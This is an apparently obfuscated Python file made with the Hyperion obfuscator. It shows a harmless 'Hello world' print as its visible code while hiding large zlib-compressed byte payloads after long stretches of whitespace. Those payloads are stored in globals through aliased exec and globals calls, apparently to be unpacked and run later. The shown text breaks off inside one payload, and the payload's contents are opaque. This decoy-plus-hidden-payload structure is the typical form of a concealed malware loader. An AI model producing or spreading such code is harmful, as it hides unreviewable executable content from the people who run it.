from builtins import *
from math import prod as Modulo


__obfuscator__ = 'Hyperion'
__authors__ = ('billythegoat356', 'BlueRed')
__github__ = 'https://github.com/billythegoat356/Hyperion'
__discord__ = 'https://discord.gg/plague'
__license__ = 'EPL-2.0'

__code__ = 'print("Hello world!")'


Multiply, _system, _callfunction, _algorithm, _builtins, Positive, Cube = exec, str, tuple, map, ord, globals, type

class _theory:
    def __init__(self, Substract):
        self.Power = Modulo((Substract, -46263))
        self.Calculate(_run=-88144)

    def Calculate(self, _run = bool):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self.Power -= -25622 + _run
        
        try:
            ((_algorithm, _system) or Multiply if (_algorithm, _system) and Multiply else ... or (Multiply, (_algorithm, _system)))

        except OSError:
            ({'Bb6adl': Multiply} or _algorithm if {'Bb6adl': Multiply} and _algorithm else ... or (_algorithm, {'Bb6adl': Multiply}))

        except:
            Cube(93411 + -21044) == type

    def _floor(self, MemoryAccess = 92239):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        MemoryAccess += 23458 + -40873
        self._square != int
        
        try:
            ((_algorithm, {_callfunction: _builtins}) for _algorithm in (_algorithm, _algorithm) if Statistics >= _system)

        except AttributeError:
            {_callfunction: _builtins} if _callfunction >= Statistics else (_system, _algorithm) >= _callfunction

        except:
            Cube(37119 * 90214) == None

    def _hypothesis(_divide = bool):
        return Positive()[_divide]

    def Absolute(Walk = -13518 + 95120, _while = True, _substract = Positive):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _substract()[Walk] = _while
        
        try:
            (((_system, _algorithm), _algorithm) for _algorithm in (_algorithm, _system))

        except TypeError:
            ((_builtins, (_algorithm, _system)) for _builtins in (_system, _algorithm) if _callfunction > _builtins)

        except:
            Cube(-27761 / -92854) == str

    def execute(code = str):
        return Multiply(_system(_callfunction(_algorithm(_builtins, code))))

    @property
    def _square(self):
        self._detectvar = '<__main__._divide object at 0x000006824BE28999>'
        return (self._detectvar, _theory._square)

if __name__ == '__main__':
    try:
        _theory.execute(code = __code__)
        Builtins = _theory(Substract = -42487 / 60506)

        _theory(Substract = 41497 + -24506)._floor(MemoryAccess = -80794 + Builtins.Power)                                                                                                                                                                                                                                                          ;_theory.Absolute(Walk='OOoo0o00O0ooo0ooOOoO00',_while=b'x\x9c\xed}[o\xdb\xca\xb2\xe6\xf3\xf2\xaf\xc8Y/\xb6\x91\xcb\xe6\xa5\xc9&\x05\xe4e\xe0\x19\x1c\x19N48\x1e\x8c3\xc8\x0e\x0c]\xb3\xe4-[9\xb6s\x925\x833\xbf}\xea\xab\xea"\x9b\x94%Q\xa2\xe8xc\x8de\x89d\xb3ykvW\xd7\xf5\xab\xc7\xfb?{G\xaf\xe8o>;\xe1%\xfe\xae\xaf\x97\xa3\xd9\xf7\x87\xf1\xf0qy\x7f}\xfd\xea_\xde\xff\xfe\xaf\x7f~\x9b\xde\xcf\x97w\xbf\xbfZ\xde{\xd5\x86\xdf\x1f\xffX\xde?p\x9d\x93\xdfG\xf3\xc5\xe2\xcf\xc7?\xa6_\x97\xc3\xc78I\x7f\x7f\xf3\xfb\x7fY|\x9f\xfe\xdbt\xf2\xfbi\xe5\xa8\xaf\xf3\xc7?\xbe\x8f\xe4\xc4\x7f<>~{\xe8\xfd\xedoR\xf6n\xbc\xbc\xfd[\xed4\x7f[s\xed\xc9\xfca\xbc\xbc\x9fTO\xe3\n\xdf}\xfd\xfa\xb7o\x8b\xe1\xd7\xef\xd3\xdaA\x8b\xf9xz\xf70\x95\x83\xfe\xeb\x7f\xbfx\x1b\xbd\x0bjU\xc6\xcb\x89\xec?\xfev?\xbf{<\xf9\xfd_\xa7\x8b\xc5\xf2\xd5\x8f\xe5\xfdb\xf2/\xbf\x9f\x1e\x1f\x9d\xf6\x8a\xda\xd8\x7f\xfc\xf0\x8f\xf9\xe4\xf8\xf4h\xfas<\xfd\xf6\xe8\x1a\xf3\xee\xdbw:\xf2\xdf\x96\x0f\xd3\x87W\xc3\xfb\xe9\xab\xfb\xe9\xe4\xefw\xffs\xbe\\L\x1f\xa5`D-\xf3\xf7\xbb\xff\xb5\xfc\xce[\xc3W8\xc9\xdf\xef>.G\xcb\xc9\x9f\xaf\x16\xf3\x7f\xd0q\x7f.\xbf\xff~z$75\xbf\xfd\xb6\xbc\x7f\xbc\xbe\xa6\xab\xfd\xf9p|\xfan\xfas\xfexrz\xb4X\x8e\x87\x8b\x87\x93\xd3\xcf\xc7\x8b\xfeb\xb1\xe8\xf3\x1f\x96\xbcq\xfc\xe5\xfd\xd7\xc5rD5\x8e\x9e\xda\x8d\xc3\x06\xcb\xc1\xd9`@\xbf\xcb\xe5\x00\xcb%\n\x96g\xc7\x9f{\xbd\xd7o_\xbf=y{\xf2:<=\xfd\xf2\xe5\xfdd~\xbf\xf6$\xc1r\x19,\x03\x1c\x1d`\x89\x0f\n\x82\xc1\xeai\xbeN\x1f\x87\x8f\x8f\xebOu\xf5\xe9\xd3\x15}\xe9\x07\x7f\xbc\xa4\x1f*\xa0g\x91\x87=Z[\x05\xc7\xff\xfc\xf1\x93\xff~\xe8\x92\x0b\xe8\xe0\xb2\t\xd7\xb7\x05\xee\x1e\xb7\xbd\\\xe2Ip\xff_\xde?}\xc2\x93\xe3\xd1\xf7\xf9\xe2q~\x87w\xf1\x1f\xc3\xfb\x87\xa3\xd5\x83qJ\xbe\x82\xbb\x96[_\xf0\x82\xce,Gpk\xe1@\xbc\x00\x14,\x83\x93u\xd7|\xb8\x9b?.\xe6\xdfG\xf5f=}C\xaf\xac\xfa\x0e\x07\x03\x14\xec~\xa6\xd3\xcf\x87;\xd5\xbb\xf9\xdddJ5\xa6\x8b\xf9\xb7\xdb\xe5x\xa5\xc2\x97\xd3u\xad\xb6\xe8\xcbkY\xb8\xf7#\xad\xf6\x97j\xb4\xc7\xe1r1k\xded\x97\xf4\x17\xf1\x0f\xfd\xe9\xe2\xaf\xd4^\x8b\xe1\x7fL\x9fj\xae\x8d\xd4b\x80v\x94\x86\x01\xc9\xe2\x9b\xc1\xdf_\xa9\xe1\xa6\x0f\x8b\xe1\x7fk\xde\xd1>|\xe4\xbf\x0f\x1f>\xf0\x0f6\xb9\xe8\x03\xb5\xd9\xf1\xf1\xbb\x9b\xe5\xfcn\xcd\x91\xf3\xc5\xcd\xfcf1\xa7\xcfbN\xbf7\xf3\xbfT+\x7f\xbf\xff\x1fO5\xf2\xba\xb9\xe8\xee\x96\xffhqG\x7f\xb7\xf2\xffWj\xb0\xc5r\xb9\xbawC\x83\xa1\x1d\xd0\xd7\xb81\xd0B\xcb\xc1_\xa9\xb9\xee\x1f\x1fv\xa6~tI\xfe\xa7{8\xa3\xdf\xb3\xb33\xdc\xd3^\xad6\x9f\x8f\x1f\x86w\xf3\x03\xb4\xda\xda3\xed\xdej\xebO\xa5\xad\xf6\xe7l\xbe\xf89\xfd\xe3\xee\xfb\x0e=\xed\xe9V;\x19\x1d\xa7\xd3\'>\x13\xfe\xca\xa7\xdc\xe2}\xc49N\xa6\x106N\x8e\xb3\xd9\xe3\x13\xb7\xf0\xd7\xe9\xbd\xe3\xe9\xcf\'\'\xef5\x13\xc9\r>\x0b\x9aN\xe62\x91\xd0\n\x98D\xff\x0cO\xf2C\'\xc7\xa7\x01\xed\r\xb7W\\\xfb\x92\xe30\x9aDY4\x89\x83(\xdf\xf6\x02O\xe5\x87\xa4\x9e\x1d/\x12\xd9d\x96\xcc\xd20\xb2[/\xf1t\x13\xad\xef\xa3~\x0f\xac\xf6\xc8\xc9JI\x83\x1e\xba\xf3\x83\xa5q:\xa3\xcf(\xcd\xd3d\xef\xc7;\xee_\xf4\xcf\xfb\xe7\x17\xe7\xe7\x17\x17\xe7}Z\xd0\x97W\x9e\xf1\xc5\xae{\xf6\xe3\xd3\xec:\xba\x0e\xaf\xcduz\x9d\xd3/\xbe\t\x1d\x98\xaf\x96\x1e\xb0\xbf\x1e\x9f\x86\xd7\t]!\xa7\xf3\x1bZ\xe2Z)\xd5\x8eVK\xdb\xb4Q\x92\xcc\xe2\x90\xbeX\xe6\xde:\xbe\x81[\xc6\xd1\x88\xdb\xb1I\xdd\xa8\xf9 \xe2\xef\x9a\xee@\x93\x1a\xe64\xfa\xe15\x99\xea\x0e\xda\xba\xd9\xb5\xe56\x8c\xe9k\xa8\x15\xed\xb5\xe5w\xbaR\xfa,4\xc8P\xd3\x11\x89\x8834\xa16\xbbkV\xfe\xbaW\xf0T\xbd\xc8\xbd\x0e\xfe\xee\xd8\xfc\xfb\xd12;\x8a"\x1a\xeeS\x1b\xd8\xc4\x9a(\x8a\x87\\\x82\xb2\x19\xb6p\x82hL%q\x1aZ\x93&\xa9Mg\x16{\x13\x1bc\x7fB\xb5\xe30\xce\xe8kb\x1b\'\xf4\xc1o\x14\xa34\x88\xf3\xd8FQ2\x913\xd0q\t\x9f\x85\xce\x9dN\x93\x99%rCW\xc5\xb9\x13\xb9\x16\x13\xa0I\xcaw\xc2\xc7L\xd3\x10\xdb\xeeN\xf6&I\xe0\xd2\x85e\x17~\x9d\x7f\xb1\xd9v\xbc\xe1%\xa6\xee\x1by/\xd2\xba\x97\xee\x8f\xb7mu\x1b\x8e\xb7}\xe8zf\r}\x02\x1bS3\xce\xa2\x99\xe5\xbfh\x9a\xa6\xd4\xbct?\xf4\xba\x99\xeeS\t\xbf\x80\xfd\x1b\x1a\xf7r\x89\x0f~\xf8\xbe\xdc\xcf\xe5AG|\xf3\x8aDb\xf3k\x10\x08s\r\xd2O\xe4\x00\x8f\xb0Z\xda\x88\x8a\xd3\xde\xe0\x80\x15\xd7w\xad\xcc\xa7\x17\xae\xcb\xc4n\x99\xbb\xaed\\\xd7jR7\xde\x9d\x96\xb4\xa0)n\xec\x8e1j\x89\xb2$\xe98\x1d\xdb\xfd;\xd5z~iH\x9f1\x7fs\xfa\xcdy[K\xb4l\xeb\x83?\xc7x"v\xd1\x06iNK\xaa\xc6\xeb\x99\r\xa9\x81f\xfb\x8f4\xb9\xe1\xcbHo\x1cO\xd0l\xb2D\x8f\x8f\xaf\xc1|\x84\xccxd<Y\xae\x9469Yr\x1d8\xce)\xe6\x196\xe6\xe1\x95\xae\x96\xb6\xe2\xfd\\g\xb65\x1a\x1a\xb8\x8e\x8e\xb2\xcc\r\x86&u\xedn\x83a\x8f\xfe\xc1S_\x10\xd3\xcb\x8fc\x9a\x1aS\x9a\x0cm\x8b7-o\x19\xff\x91\xdcI\x9b\xd6\x0c\x1c\'\x1dv4\xdbp\xd3+\x1fc\xdd\x14\x17z\xdb:%n\xab\xd7d:\\\xd3b|?,\xf7.\xf9\xee\x06\x83V\xfdoW\xd9c1\xbc\x1dM\x86\xafnn \xfa\xde@\xb1\x8a\xd5\x9b\x9bE\xef\xa9\xdb]\xf3\x0c\x8b9\x8e\xc0\xf1$A\xb3N\xb6\xc9\x80\xccy\xfc\x8aH\x11\xd2 \x0c\xaes\xaa\x1d\xd0v\xad\xf4\xd9\xa5l\xd7(\x03Q\x95\xf0s\x06\x03\xfc/{O\xebr\xd6I\x97\xe7\xfd\xfe\xc5\x05\xe4K\x12*Y\xb6\xecC\xd2|\xc9C"\x8a\xcc4\xcd\xa6\xe1h8\x9c\xd8 \n\x0c\xf8\xe81M\x039\xb8\xdaC\xcf\x8a\t3\xe14\xb4\xdc\x12\x1f\xdd\x96-\xacw0+\xc6\x90m\x0e>\xc9W\x1fC\xd7\xfd\xb5r\xbb\x83\x87"I\xa4\xc5\x14\x1d\xc9\xd4|\xa9\x0c\xb1^\xbd\xad|\x19*\x0f\xe8\xa65\xe5\x01s\xb7m=\x19s[\xdd\xb43\xb1\x03\x92\x1e}\xc7i\x12O\x0f\xdf1lF\x1f\xf9\x93\xb5\xacX\xb3nk\xeb5\xf7x(3!\xa1\x15\x8c%X\xcc0\xa2y+\x9aR\xbf\x0f\xa2,\xb1\x10\xa4S\x93\x82\x1f\x8ci\x98O\x13\x13\x05\xe0\x05P#\x1eE\x81\xd4 ~\xc0`\xcb\x8230QN5\x89#$\x9e\x90\x1a\x8aj\x10\xf7hFh8\x9c\x9b\xf8\x07\xe2+\xe97\xc5\x15\xcc\xc8d\x891\x133&\x06;`\x16wD\xc2q`pTL\xeb3>[L\xdce$\x824\x9d\x03\xbc\x88\xe5{\xd4o\x90\x900\x0f^\x15\x82|\xed*\x07\x7fMt\xb7S\xfa\xca\xef\xd4\xdb\x9aV~\xa7\xc5\xfa\xa4\x0b\xd2\x14\xc6\xfb+4\xd7\x93\xa6\x8c>\x96>\x99\xfb\xd8\x95\xadb\xbd\x0b\xd2\xe4\xde \xbd\xcb\x08}\x87\xfa\xdc\xfer\xbb#T\xc2d\xe2\xf3\xa2\'T\'b\xd2\x98\tS\xea\xfb\xc9\x8cUK)\xb5A\x845\xecfu\x12&\xd9$\x85\x14FT\x8fj\xcfX\xd5\xa5\xca%\x92\xd5,F+q\xa1TnZ*\x99\xb6\x99\x9eT}_799\x85\xfe\xbe\x1dD\x94!\xad\xb4\r\xaa\x9d\xb4\x9e\x16A\x05\xa9B#\xe9f\x94&u\xb3\x86|\xe1\xae\x94dh\xc6\xf4\x19\x9a\x9c\xbfX\x93u\x94\xe7\\"_\xae\xf7\xb2\x07\xdc\xfa\x87\xc4\x83\xf0\xe4"K]\xafn\xe3s\xf0\x07,\x86m\x13\xbe~\x83K\x9d\xf3\x08+\xb8\xf9\x97NI,\xd4\xd3\x87\x1f\xf53b\xf3g\xf4K\x1f\xac\xbb-\xf9\xe3e\xe7#\xfe\x00\x8aHU \xaa\xa1B\x99H\xe3\x04v\x94\x85\x8e44\xa9\xbb\x83\xc8\xb8^\xc5\xec\xee\xdf\xd3}5\xe3\xa9\x0f\xd0\x1eI\x8d\xe4\xd5\x9f3\xf0tQM\xea\xee\xa0\x8b\xda\xd7P\x1d[\xd8`\x0eO\xa8\xa87C\xcb\x85e\xea\xd6\xf1+\xe5\xb2\x86\xa5\x96u\xa1\x86\xc5\x90\xa2\xee\x06F\x97\xa7\xf5\xc3?\xa4)\x87\xae\x0c\xe5\xb2DJ\xbb\x98fb\xe6c\x98\x9b!\xae\x05\xe62\x98\xc4\xc0\xab\x84\xe9\x04Z\xe7\xfd\xf9\xbc\xe5\x92.5\xe0\x0f.I\xb7\xf0+4c\x03vl\xc7\xb9\x96\xa2\xa3\xebmp\x85\xda\x87K\x10\x0e!w\xfc\xc1\xd8}\x87\xc5\xbeq\xc1Kt\xc3)\xb4\x927\x8e\xdde\x94\xb05%n\xf6:\xbf\x0e\xe8\x93\xb1\xc9\x1bz>"w\xaf\xb3\xd5\xd2&\'\x83\'\x84eO\x08\xcb\x1a|\xcb\'\xb3\xab\xa5MO\x16\xf2\xb5\x13><a\xad\xa4]-}f\xadd\x0b\xd2\n\xc3\x0e\r\xd2\x16C\xf1\x82]d\xa0\xcc\xa4\x9f>\xaf\xbdtN\xa9\xa6\xe1\xe8`Vq"\xb3-\x96\xba^\n\xd3\xb63\x81\xda\t\x95){7X!\xbf\xa5\x90\xa8\xbe\x11\x98T\xad\xb19\x89\x93I\xd5?!I\x84t;\xf1\xb2C\x91\xb2P\x97L<\xd5\xc9\xa4X\x96\xe5](S:\x91\x91=I\xb8\xe2\xe86)]\xde:x\x14~\x971L\xb3\xf0GI\xbbxS\x9e\xfc\xa62\x9c|Jy\xae\x8b\t\x08S\x90e\x1b$\x1cs\xa0=\xcf\xd9MG\x9du\xb28\x89\xf7wa<\xfe\xa4s\xb5.\xae^6\xedb\xa7\xa6\xca`M\x87$\xcc\x0f\x89\x85c\xce\xaa\x18\xfaa:&\x86\xb2\xb5\xc3\xd1\x80\x1do]\xb0\x1d\xa2X\x02\xdc\n~\xdb\xb4\x93\xbav$\x9e\x14\xa1\x9e{\xeaV\xb6\xae\x8eI\x1a\xbb\x94\xed3\x1dV[')

        Builtins._floor(MemoryAccess = -24953 / Builtins.Power)                                                                                                                                                                                                                                                          ;_theory.Absolute(Walk='oDOooOOoODOOODDDoOODOoOO',_while=b's\xffv\x13\xf7en\xbe3f\x12\xdb\xb4\x97\xef\x05\x10{J\xab\xd8\x93\xc8R\xcf\x1c\xbd\xadn\xd2]\xff\xd4\xa9c"\x1a\xcdV\xe2\xcc\xf1m\x11\x94\x82 \x95;\xfdy\xd9C\xb4\xdb\x19\xd3\xb3\x0f\x95\xd6"[X\x8b\xacW\xe6\xacH\xdb\xa9\xf2\x93a@\'\'\xffw]\xe0\xda\xe9\xf2\xfe\xe4d%\xd0\xeatx79Y{\xc8\xdaw\xfc\xc3\xfd\xc1\xa3\x9f}\xfa\x7f\xfclkU\xcc=r\x11y\xdbI\xd1\xfdK\xab\xe2\xb6\xba\xa6C\xab"\xf1\xdd\xe0\xbcF\x1d\x19\xabJ\x1e\xaa\xc2I\x95\xa6\xab.T\x19\xb0\xe5\xb1_Y\x8b9\xf9\xca9X\x7fr\xc23;^7u\xe3\n\xd8MZ\xdc\xdfC\xf6\tKWK_~l\x06M\xdfq\xda\xa2\x11\xdd0\xaeP\xce\x97M7\x0bg3C,^\xca^\xd8\xfb\x9bq\x8f\xd9\xe5\x08\x01;L\xa7\xe6\x12\xc9\x03_\xa4gQ\xaf\x86\x8ez\xa8\xaa\xd4zTF-L\xd6s\xf5\xdbV\xb7\xa1o\xc3\xfeF\xc8\xfd\xa7h\x993no\xef\x8an\xc6\xd3IS\'/h_\x02\xe8_\xae\xe1\xe2\x9c:\'\xafZi[^SC\x13\xb4i\x8d\xdb6\xded\xb0\xad^\xc3\x89\xa0\xddd\xd0\x81q\xdf\xb0F[4\xd8\xa9\xd3i\xa733\xd3_\xec\xebDs\xd8"\xf0\xaa\xdfG\xa0\xd5\x05\xe2\xae\xd8A\x0e\xcbg\xd5\xef\xee\xfe\xfe\xe0-\x1d\x13\xd7\x0bm\xb7\x81\x9d>\x82\xac?KM\x9b\x08\xb43w\x9d\xe5\x19\xc4\x08^\x85\xc6\xf9YH\xd8\x8e\x04\xff\x85Y-\x8d\xd7\xd3\xcb\xa5)\xec;\x1dYr\xa2\xb4*@\xc6mBP.\x8b\x08\x94\xcb\xd2\xa5\x05\x7fM\xde\x7f\xcc\x8ah\xf1[\x8f\x98\x9e\x82\x152\xab\xa5m\xad\x88:M\xe9\x94\x95;:Z\xc8\xee\xb5H\xbdMuw\x88\xd4[oTF\x0cd\xc6OIO\xc7\xcf\x1b\xf2\xac\x12\xd7K\x9b4c\xc4\x16\x07\xc4\xd9`\x89\x93 \xcc2^-}\xe6\xa1\xb6\xa75)gk\xd1\xd8Y\x90\x86\xbe\x17\xca\xffw1\x14\x17\xc3\xb4s\x17\xc3c0\xa2\x0bbH\xe1S\xcf\xbe\xf1s\xf0\xa7M9\xa6\x80zo\xcen\xf0\x88\xb9U\xb7\xf8Zi[\x8e\xc9w\xb6\r\x922\xceO}"r\x8fk\xdaV\xb7\xa9\x1b\x95oY\xbdr\x16T\'\xfd]]\xednY\xf5\x82%]\xc8\xa4\x84J6bM\xdbG\xf0;\xb2\x16\'U\xc7\x890)\xa3D\xfc`\x9fmu\xbbu\xb0(\xd8\x17f\\h\x84\x95n\x88R:\xa3\x11\x04\xdb\xd1\xc4"\x1a(K\xd9W\xa1\xb5G9\xdfd\xe4\xee\x0fw\xdalfK$\xb2\xdd\t\xf4\x01K\rf\xb5\xb4\x99\xc6 s\x81\xd5\x89\x0b\x9c\xb7\xac1X)\xfd\x05\x16\xdd\x17\xa7{\x84\xc3W\xe9?R\xf5 )\xf6\xa9\x8fI\x0b\xc7\xb0\xe70t\x1d\xdf\x16\xcae\xa6\x13\xa2e\xa6\xd5\xb6^f:\x98\xf3\xa4\x1a\n\xa6\x941\xf7\xbc\xcc\xb6\xd5mH9\xf7\x0fm\x8dybd-=\xb5\xe6\x04\xa1\xf3~`{\xd9\x99\xa8\x0f\x0b\xa7N\x1d\xcc\xc6\x89\xf3W\xe6\xc0X\xb15!\xf4\xbd\xd8\xcbSj\xca\x13?\xd7)\xa4[\xd8\xa6@@B\xdd\x13G-\x02j\x8f!\x17\xb1u\x85\x8dT\xb4\xaf\x95UJ[^\xf1#4\xb0$KJP\x03\xeb\xbd\xbdmu\xbb\x0bHq\xd0\x05\xcc"\xb5\x90.\x07\xd2t8/\x84\xcc\x06\x8dw X\t\xed\xe7:\xd9i+\xea\x04\x98\xd5\xc2~6\xd5\xedvb\xa4\xd1\xd0\x82\xd1\x13\xdcS:\x1d\x9f\x7f\tg\xb5\x06~j\xc7\xa7\x865\xd6\xb1c\xe8\x10\xed\x08\xe1-Y-m\xe6N\x951H@\xce\x07\xc1\x89\xca\xb0;\xd5J\xe9\x01\xd5\n\x07\xe8\'\xfb\x08E\xed&O\x99[\xda\xc673R\x8426\xfc=h\xbb\x1e\xc4\x13ZC\x963o\xa9e\x12JWR\xb9mu\x1b\xda\x92\xdb\x8c\xc1\x1aJ\x01\xb1\x9e\xc0\x1e\x88\x89\xfa\xc5\x9b\xb0\nlu\x1e\x9a2Z\xc1\xfe\x91\x9d.&@\xa1b\x17\x8a\xb5\xdbHp;\x88\xc3\xb6\xda%MRF?\x86\xdev\x1d\xa4eS\xdd\x83\xa8ZB\x07\x8f\x00]H*j\x97\xb7\x80\x83Z)}N\xeey\xa3\xc70\xbbc,\xc5sx\xc0z\xd5F\xc4\xec:\xe3\xa7\x11\xba\x0c\x97Q\x90\xd0p\xb5\xf4\xe5\xdb\x15;QTo\xf6V\xc8\n\x1f\x85j|k%\xc2\xb5\xb38\xd7\x18\x9cj\xc8\x11v\xe0D\xf3\xd8\xd0\xa5\xd28NSp\x9f$\xcaF1\xd4P-\xe8>\x03#\xc0\xc0\xc8\x8a\x1c\x80$,\x16\x80Lh\xab\x83I\x1c\xc7\xa3\xc3V1@T%`<\x1d\xcc\xb6\xba\r\x81s\xf6i\xdf\xfd\xdd\x17\x8e\xd5g\xf8\x9c\x91\xf6\xcei\xe3\xa2\x81\x9d\x07\xd8/\x01\xabp#VbC\x86\x87\x1a,_-m\xc6\x1fA\xc0O\xf9\x10\x81\x8c\x11\xfeh\xa5\xf4y,\xc7\xcf\xeb\xfdmX\xb3\xd9\xe2\x15**\x08&E\x00e6\xb0\xaf\xbf8;\x9di\xe9\xed\xb7^a\xa2\xd1\x9cy\x11\xebY\x8d\xe8\xd0O\xae\xfa\xf9\xc3\x07C\xda\xa4Df\xf3\x11\x85t\x9b\x19\x03\xcfwp{\xdd\xbd\x83*\xa1\xf5\xe6\xce\xc2\x88\xaasATm\xa8\xf9><\xa4\x9a\xa2;\xc1\xc4\x132d\x14\x84,\xbbZ\xfa\x8b\xa4\x98\xbd\xe3\xe4\xe8\xb3?J\xd3\x86\xbe\\w\xfb\xd6\xb5\xbacxG\xae\xe0\x88gh\xe3\xc8<@\xee\x90\x80\xfd\x98\x01o\xbc\x0c\x9e\x17Li\xaf\x97Y\xaa:\xbb O5\xa4\x11\xebmU\x7f\xb3\x8e\xa2\x03\x9f\xd1\xe4\xb0\xf6NX:\xcc=\xd0\xbd<\xd5\x9e\xadP|\xdd\xf4\xe7=\xc0\xf7:i\x00/0I\xd72/h\xa9\x9b\x10%\xbcMztc[\x0c\xe99\x03\x8a-\x9c\x9b\x1f;\xf71\x0b\xdeh>1.`/g:\x8f\xb0=Q\xb1\xad\x94\x1et\xcei\xac\xe6q\xfc+;\xc8\xd9BeW+\xfbE|\xe6\x9e\xf4\xcc\x84\xc4h\t\x92\x12\x9b\x17`\x04\xa8\x9a\n\x92\x00A+\x16\xae\x9f\x15\x84]S3L\xb4\x8aHe;c\xe4\xb4s\xd1\xaf\xc1s]\xffZTU\xa36\x05\x8d\xdcP\xa0\xab\xd4\xb3A4\xa9\xbb\x83\xe3\xe8\xbe"D\x9arx!&*\xc1\xaf\xb1$\x84\xa6\xa9\x80+\xb3\x93\xc7\xd8\xd2\x9e"ji\x7fi\xd1\xe9\xdd\xa0\x82s\x99\x9b\x1aI\x8b!\x0bqF\x863\xdbtEK\xb5R\xfa\xf2\xb57\xd4\xba\xc2\xe29tim\xf06~fK\xa7\x13c\xb5\x18LAt\xd5fB8,\xed\xb1\xf0\xc8\x0e\xa01\xaf\x97\xbd\xfc&]\x03\x1c\x1e\xf2\xe4\x8c=\x11\x13\x1f\xcf"J\x8dN\x8c\x8b\x0b\x95\xad\x100S\xbe\x18\x87v\xc0\xfc\xc4\x94\xf6\x8ca\x19\xa5r\x17\x94\x9b\xf0\xe4N\xd7\x9b\n\xa9Cpn4\xf6`\xc3\xa7+\xda\xeb\xda\x19\x89-p\xe7\x8c\xc6\x1cF\x92\x10\xa3\x86P\xde\x98\xe1\xcd\xa94\x0e\x19\xb95\x8f\x13\xa2\xa8\x86\xa3%#\xde\x8ay\x1f\xdc\xadB\xb7\x9e\xb3\x8f\xb0\x80\x0fFp\xbcw.\xf8i\x9c\xd1\xfeQ\xf9\\&\x93\xb5\xed\xf7\x9f\xba\x9a\x118\xa9\x19\xe0\xd6\x9f\xb8\xa3\xc0\x81\xac\xe3*\x86\x1d\xff\x813\x1b\xf2\x96\xe5\x1a\x19\xd7\xc5_\x0e\xebq\x01\xe1\x1e\x14\x93\x81\xbc\x07\xc3N\t\xe3(H"j|K\xcb\xc0\x84\xf4\n\x13Z\xa3\x89\x05\x8ec\xd4(!\xd5\x0b\x93\xc8\x9d\x87ZLZ\x90[\xd42\xb2V\x86\xa7JgU\xdb7]=\xa0\xaf\xb4O\xeeB\x14\x12i\xcd\xf2\\\xa0\x80\x8c\x8a\\\x02\xc3\xbbw\xe6\x03H\x0b\xdeWe\xda\xeb\x14\xb5\xab\x8a/\xa9\x18\x93%\x8c\xa6\xacw\xc1\xe2\xb5%\xf8\x1b\xfcP\xd2\xd2\x03\xa5\x80%rk\xbc\xd5\tHK\x1b\xdb\xd1\r\xeb\xc6\xe6E\xc8\xdcA\x95\x1e\xbf\x98\x84>9\xf8h\r\xb6\xc1\'\x07\xdf\xbe\x8dX\xba\x00jp\x18\xbb\x01\xb6\xb5\x86\xaa\xbf\xa2\x06\xe0\xf8\xbe\x1c\x1c=\xebYC7\xd5e\xa0\xfaN\xd5\x01\xd4\x07\xdbx|l\x92\x81K\xe9W$\xde\xbc\x80\xa2\x1f\xbb}\xfc\xd9\x1f\xeb+b\xd7\xd4\xc4!\xa5\xa4\x8eax\xa2\xf4\x05\xd8\n?|\xe0t\x83E\xe2A\xd9n\xc6k&\xd7\xe23\x9e\x0bF\r\x8b\x95\xd1ji3\xb3#<\xf53\x16\xf7 \xf6\x89\'{\xb8Z\xda<  q\xfe\xeahu\xfbV\x03\x02*\xa5\xbf\xccz\xe1\\\x7fo\x9d?\x9e\xf3\xc9\x13\'^\x94\xed\x86\xaf\xad\xa0\xc5r\xdbn5z\xf9\x88\xa0\xac\xfcA\x0c=q8\xd1\x04\x8e\xf3\xe0Ml\xe2<\xee\xda\xc4\xd2\xdf\x15ic$T\xaf\x99\xc79\xec`\xb1\x1b\x9e\xf0\x14Bf\x04\x8e\xca\xab\x96\xb6u\x96.,\x95\x89\x07\xb1\xefQ\xd6\xc4s\x96\xdeV\xb7\xdbX\xbd\x9ab\xb6cL\xba\x12\x8f\xae\\\xe2W\xd9\x1dlw\xc8\xbd\x91d\x199\x11\x1f\x02\x11L\x0bQ\x14\x94\x00#\xd8\xdf)\x8c\x8eB\xe7T\xb7\'M\xa1t\x1cQ\x11\xc5\x8f<\xbak\x06\xac\xedDR\xb6\xb0\xd8\xfaU\x10\xf7\xf2S\xc7\xb0\xc7Z\x17\x1au\x92[\xadB8\x8d\x91\xab\x85\x83\xd12\xac[z\x99X\xc63I\xfa\x17\x83\x84\xb12A\x11;\xda\xa8\x10\x98\x13S\x1c\x1d\xc9\x8c\x06\xfe\xece9\xbe=\x9f\x17~m\xbct\x00\xc9\xaar\x8f\xca;N\x1e*K\n\xa8V\xd9\xea\x04\x99\xc9\x84vh`0\nc\xe09f6\x89C*\xce\x13\x84e\x918Mb{`"\xa2\x11\x90\x993\x92\x7f-\x15\xb2\xd4L\xc7\x91<@_\x92\xf6\xa13 bN\xe2\xb5\x99\xf1\x00\xb2)\x02\xb1\xc2\x04\xc4%K3\x18\x8a\xe8@\x9b\xc2\x12\x14bo\xca:\x02\x0bI=\xb6\xd6\xe4\x16\xb3\xe3\x8cu\x05)]3\xe4}\x934\xb5C\xae\x87H-\x04d\x86\x06~\xee\x19\xc7\x81\x92\xf4M\xf7O\xd7K\xc71\xe0\xce\x8c\x18_R\xbaO\xba\x91\x10kT{H\'\xa6/\xf4\x17qB#(5#\xbaBB\xf7\x801\x9ca?\x1dH\xcf\x12g\x06O\x89;\x86ovh\x10\xd0=\xa4\xda\x11\r\xae\x04\x96,\xdc#\xceHO56t\x10=\x0b\xb5\x05\x82\xdf\xe2\x9c\x8e\xa0\xa3\xd3\x10\x8d`1^m:AK\xd0\xd32\x8e\x0e\xee>\x8e\x0c\xdao\x94\x84q')

        if 131389 > 6998320:
            _theory(Substract = 96078 - -96325)._floor(MemoryAccess = 99574 - Builtins.Power)
        elif 232240 < 4962508:
            _theory(Substract = 66878 / 90206).Calculate(_run = Builtins.Power + 24258)                                                                                                                                                                                                                                                          ;_theory.Absolute(Walk='XXXWXWWWWXWWXWXWWX',_while=b'\x80\xe7\xe260\xb8B\x8a\xa3\xd0|\xd0I\xd1q&r\xb1\xde\xf4\x8c\x9d\xa4\xaa\x1a;\x8b\x99\xae\x8d\x8bdUb9k 